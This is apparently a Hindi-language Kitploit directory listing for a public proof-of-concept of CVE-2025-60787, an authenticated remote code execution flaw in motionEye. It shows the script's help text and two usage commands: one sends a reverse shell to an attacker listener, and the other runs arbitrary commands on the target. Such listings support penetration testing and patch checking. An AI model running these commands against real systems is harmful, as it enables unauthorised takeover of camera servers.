Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-60787 — CVE-2025-60787 के लिए PoC - motionEye में 0.43.1b4 (सहित) तक के सभी संस्करणों के लिए प्रमाणित RCE | Kitploit
उपकरण/GitHubGitHub/gunzf0x/cve-2025-60787
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubgunzf0x/cve-2025-60787

CVE-2025-60787

CVE-2025-60787 के लिए PoC - motionEye में 0.43.1b4 (सहित) तक के सभी संस्करणों के लिए प्रमाणित RCE

रिपॉजिटरी देखें
1015 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-60787 - motionEye में प्रमाणित RCE

CVE-2025-60787 के लिए PoC, जो motionEye के लिए एक Authenticated RCE भेद्यता है, जिसमें सभी प्रभावित संस्करण 0.43.1b4 तक (सम्मिलित) शामिल हैं।

यह इस रिपॉजिटरी में वर्णित भेद्यता के लिए एक स्वचालित PoC है। श्रेय prabhatverma47 को।

उपयोग

स्क्रिप्ट में 2 कमांड हैं जो इस भेद्यता का दुरुपयोग करते हैं। एक जो सीधे revshell नामक रिवर्स शेल भेजता है और दूसरा कमांड command नामक, जो इस CVE का दुरुपयोग करके सीधे कमांड निष्पादित करता है।

root@kitploit:~
❯ python3 CVE-2025-60787.py -h

usage: CVE-2025-60787.py [-h] {revshell,command} ...

PoC for CVE-2025-60787 -- Authenticated RCE in motionEye by gunzf0x

positional arguments:
  {revshell,command}  Choose between send a reverse shell or (attempting to) run commands
    revshell          Attempt to send a reverse shell using CVE-2025-60787 vuln
    command           Execute a command remotely using CVE-2025-60787 vuln

options:
  -h, --help          show this help message and exit

रिवर्स शेल

शेल प्राप्त करने के लिए revshell कमांड का उपयोग करें। उदाहरण के लिए:

root@kitploit:~
python3 CVE-2025-60787.py revshell --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -i 10.10.10.15 --port 9001

जहाँ 10.10.10.10 लक्ष्य मशीन है (motionEye चलाने वाली मशीन), 10.10.10.15 हमारी हमलावर मशीन है और 9001 वह पोर्ट है जिस पर हम रिवर्स शेल पकड़ने के लिए सुन रहे हैं।

कमांड निष्पादन

यदि रिवर्स शेल के बजाय हम अन्य कमांड दूरस्थ रूप से निष्पादित करना चाहते हैं, तो हम command विकल्प का उपयोग कर सकते हैं। उदाहरण के लिए, पीड़ित मशीन पर ping -c1 10.10.10.15 कमांड निष्पादित करें:

root@kitploit:~
python3 CVE-2025-60787.py command --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -e 'ping -c1 10.10.10.15'

जहाँ 10.10.10.10 motionEye चलाने वाली मशीन है।

अस्वीकरण

इस स्क्रिप्ट का उपयोग हमेशा अपनी स्वयं की जिम्मेदारी पर करें।

नैतिक रहें (:

टूल डाउनलोड करें